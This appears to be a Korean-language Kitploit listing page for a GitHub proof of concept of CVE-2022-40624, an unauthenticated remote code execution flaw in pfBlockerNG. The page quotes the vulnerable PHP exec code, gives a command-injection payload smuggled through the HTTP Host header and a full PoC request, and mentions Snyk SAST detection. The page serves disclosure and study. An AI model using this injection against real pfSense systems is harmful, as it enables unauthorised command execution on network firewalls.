Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
pfBlockerNg-CVE-2022-40624 — pfBlockerNg의 DNSBL TLD 쿼리 함수에서 무결함 입력을 통한 인증되지 않은 원격 코드 실행을 위한 개념 증명 익스플로잇 (SAST 탐지 분석 포함) | Kitploit
도구/GitHubGitHub/dhammon/pfblockerng-cve-2022-40624
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubdhammon/pfblockerng-cve-2022-40624

pfBlockerNg-CVE-2022-40624

pfBlockerNg의 DNSBL TLD 쿼리 함수에서 무결함 입력을 통한 인증되지 않은 원격 코드 실행을 위한 개념 증명 익스플로잇 (SAST 탐지 분석 포함)

저장소 보기
223년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

pfBlockerNg-CVE-2022-40624

배경

pfBlockerNG는 다음과 같은 기능을 갖춘 pfBlocker의 차세대 버전입니다:

  1. IPv4/v6 목록 소스를 '거부, 허용 또는 일치' 형식으로 관리합니다.
  2. MaxMind Inc.의 GeoIP 데이터베이스 (GeoLite2 무료 버전).
  3. 중복 제거, 억제 및 평판 향상.
  4. 다양한 목록 형식에서 다운로드 기능.
  5. Proofpoint ET IQRisk IP 평판 위협 소스에 대한 고급 통합.
  6. Unbound DNS Resolver를 통한 도메인 이름(DNSBL) 차단.

https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html

영향을 받는 버전

pfBlockerNg <2.1.4_27

취약점

인증되지 않은 원격 코드 실행 (RCE)

index.php의 TLD 차단 섹션 쿼리는 HEADER Host 소스로부터의 사용자 입력 d_query가 PHP exec 함수 싱크로 이스케이프되지 않은 채 포함됩니다.

exec("/usr/bin/grep -l '^{$d_query}$' /var/db/pfblockerng/dnsblalias/DNSBL_TLD", $match);

/pfblockerng/www/index.php

root@kitploit:~
// Query for a TLD Block
if (empty($pfb_query)) {
	$idparts	= explode('.', $query);
	$idcnt		= (count($idparts) -1);

	for ($i=1; $i <= $idcnt; $i++) {
		$d_query = implode('.', array_slice($idparts, -$i, $i, TRUE));
		exec("/usr/bin/grep -l '^{$d_query}$' /var/db/pfblockerng/dnsblalias/DNSBL_TLD", $match);

		if (!empty($match[0])) {
			$pfb_query = 'DNSBL_TLD';
			break;
		}
	}
}

익스플로잇

pfsense 웹 콘솔에 대한 HTTP 액세스 필요 샘플 페이로드: ' *; sleep 5; '

PoC 요청:

root@kitploit:~
GET /pfblockerng/www/index.php HTTP/1.1
Host: test.test2' *; sleep 5; '
Content-Length: 2

영감

저는 pfBlockerNg를 좋아하며, Di r00t의 최근 CVE-2022-31814와 훌륭한 글 https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/ 에서 영감을 받았습니다. 또한 Snyk 정적 애플리케이션 보안 테스트(SAST) 도구가 이 취약점을 탐지할 수 있을지 궁금했습니다. 그래서 해당 index.php 버전 2.1.4_26 파일을 다운로드하고 Snyk Code를 실행했습니다. 예상대로 Snyk는 해당 취약점과 몇 줄 뒤에 있는 또 다른 유사한 보고를 탐지했습니다.

도구 다운로드